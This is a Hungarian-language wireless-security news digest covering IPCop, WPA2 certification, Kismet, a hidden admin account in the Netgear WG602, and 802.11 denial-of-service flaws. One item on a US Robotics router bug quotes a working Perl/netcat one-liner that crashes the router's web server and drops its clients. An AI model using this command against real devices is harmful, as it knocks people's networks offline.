Folytatás következik...! Az EnterpriseNetworkingPlanet.Com weboldalon megjelent az IPCop Linuxról szóló cikksorozat második része...

Az EnterpriseNetworkingPlanet.Com weboldalon egy kis leírás olvasható az IPCop Linux disztribúcióról...

Az ember mindig kíváncsi arra, mit használhatnak a titkosabbnál titkosabb kormányzati és katonai szervek hírszerzésre, hálózatokba való behatolásra -- nekik az átlagemberrel szemben szabad hálózatokat feltörniük, és valószínűleg élnek is a lehetőséggel, ahogy azt egy, a tomsnetworking.com-on megjelent cikk is tanúsítja.

Build and Secure a WLAN címmel egy cikkgyűjtemény jelent meg az enterprisenetworkingplanet.com weboldalon...

A legnagyobb probléma a WiFi-nél a biztonság. A legtöbb felhasználó a WLAN-ját tárva nyitva hagyja illetéktelenek számára, és soha sem foglalkoznak a hálózatuk védésével. Ezt szeretné áthidalni az új, egy gombos technológia, amivel a HP, a Linksys és a Broadcom rukkolt elő az idei CES-en.

Tegnap a Wi-Fi Alliance (WFA) , WPA2 (Wi-Fi Protected Access 2) hitelesitéssel látta el az Atheros, Broadcom, Cisco, Instant802 Networks és Realtek gyártócégek egyes termékeit. A szigorú ellenőrzésen átesett néhány eszköz az elsők között van, melyeket a WFA bevizsgált és WPA2 Certified jelzéssel illetett.

Mike Kershaw alias Dragorn, a Kismet készitője, nappal IBM mainframeken dolgozik, éjjel pedig kódol.

A Hewlett-Packard, a Pocket PC piac egyik vezetője két ROM update-et tett elérhetővé vásárlói számára. Egyet az iPAQ h4150 és egyet az iPAQ h4350-hez.

Újabb Wi-FiPlanet cikk a Wireless LAN Tools sorozatban!

Megjelent a Wi-FiPlanet cikksorozatának legújabb - immár harmadik része: Wireless LAN Tools: Discovery and Planning.

Wireless Networking for the Paranoid Hacker: Ezzel a cimmel jelent meg a New Order-en egy vezetéknélküli biztonsággal foglalkozó cikk.

"A New Scientist olyan tapétáról számolt be, mely nem engedi, hogy a hackerek használják drótnélküli hálózatunkat - anélkül, hogy a mobil telefonok szignálját zavarná. A technológiát eredetileg katonai célokra fejlesztették ki (hogy a radarokat eltüntessék)." - írja a Slashdot.

Hibát találtak a US Robotics USR808054 WLAN routerében.

A hiba az admin felületet is biztosító webszerverben van. Egy sima perl scripttel le lehet DoS-olni az egész routert.

perl -e '$a = "GET / " . "A"x250 . "\r\n\r\n" ; print $a' | nc ap 80

Ez kiakasztja a router-t és természetesen minden kliens leszakad róla.

Forrás: wireless-zug.ch

A Wi-FiPlanet.com-on megjelent a Wireless LAN Tools: Analyze This, wlan biztonsággal foglalkozó cikksorozatának második része.

Az első részt elolvashatjátok itt, a második pedig megtalálható ezen a linken.

Az Astalavista Security Center oldalain található az Airmagnet egy white-paperje a drótnélküli biztonsági technikákról (pdf).

Lemirroroztam, így tőlünk is leszedhetitek az angol nyelvű anyagot erről a linkről: wlan security best practices.

Hibát fedeztek fel a Netgear WG602 típusú termékében. Egy nem dokumentált azonosító és jelszó segítségével, bárki aki eléri az access point web felületét, adminisztrátori jogokhoz juthat. A webes konfiguráló felület LAN és WAN oldalról is elérhető, semmi más nem szükséges hozzá csak egy web böngésző.

Új sebezhetőséget találtak a vezetéknélküli eszközök kommunikációját lehetővé tévő 802.11 protokollban. Bár a technológiából adódóan eddig is lehetséges volt Denial of Service típusú támadást indítani ezen készülékek ellen, de ez most már speciális berendezések nélkül is kivitelezhető.

Az elmúlt évben sok wlan "switch" gyártó jelent meg a piacon termékeit kínálva.
Most sokan közülük biztonsági és azonosítást végző megoldások fejlesztőivel
társulnak, hogy szolgáltatásaikat fejlettebb biztonsági megoldásokkal
javíthassák. Az elmúlt héten a Legra Systems, a Chantry Networks és az Aruba Networks is
bejelentette, hogy megerősítik az általuk kínált termékek nyújtotta biztonságot.
A Chantry Networks a Blue Ridge Networks-sel társult, hogy BeaconWorks nevű
rendszerébe integrálhassa az utóbbi biztonsági kommunikációs platformját. Ezt a
platformot a szövetségi kormány is használhatja, mivel megfelel az FIPS-140
szabványnak. Eközben a Legra és az Aruba mindketten a Funk Software-rel működnek
együtt. A Funk a legtöbb vállalat által autentikációra, autorizációra és
naplózásra (authentication, authorization and accounting - AAA) használt RADIUS
(Remote Authentication Dial-In User Service) szerverek vezető fejlesztője. A
Funk fejleszti az Odyssey nevű kliens szoftvert is, amit a RADIUS szerverek
802.1X-re épülő autentikációjához használnak. Mindkét cég azt nyilatkozta, hogy
rendszereik hamarosan tökéletesen együttműködnek majd a Funk termékeivel. A
Funkkal való kooperáción kívül az Aruba a Zone Labs -szal, a közkedvelt
ZoneAlarm személyi tűzfal szoftver készítőivel is társult, amelyet az Aruba
társalapítója és termékekért felelős alelnöke Pankaj Manglik "wireless gyógyír"
-ként ("wireless remediation") emleget. "Az a hatásos, ha biztosítjuk, hogy
egy egység, amely rendelkezik anti-virus szoftverrel, vagy tűzfallal, a
(gyártótól származó) termék megfelelő verzióját futtatja, mielőtt
kapcsolódhatna [a wlanra]." - nyilatkozta Manglik. A biztonsági irányelveket a
Zone Labs Inetgrity policy motorja foganasítja. Ez hasonló az olyan hotspot
szolgáltatásokat összefogó cégek, mint az iPass, vagy a GRIC, által nemrégiben
bevezetett policy-alapú biztonsági rendszerekhez.

A következő leírásból megtudhatjuk, hogyan válthajuk ki a nem biztonságos WEP titkosítást egy erősebbel, ha rendelkezünk a megfelelő eszközökkel.Elérhető a Howto szekcióban, vagy közvetlenül innen: Klikk!!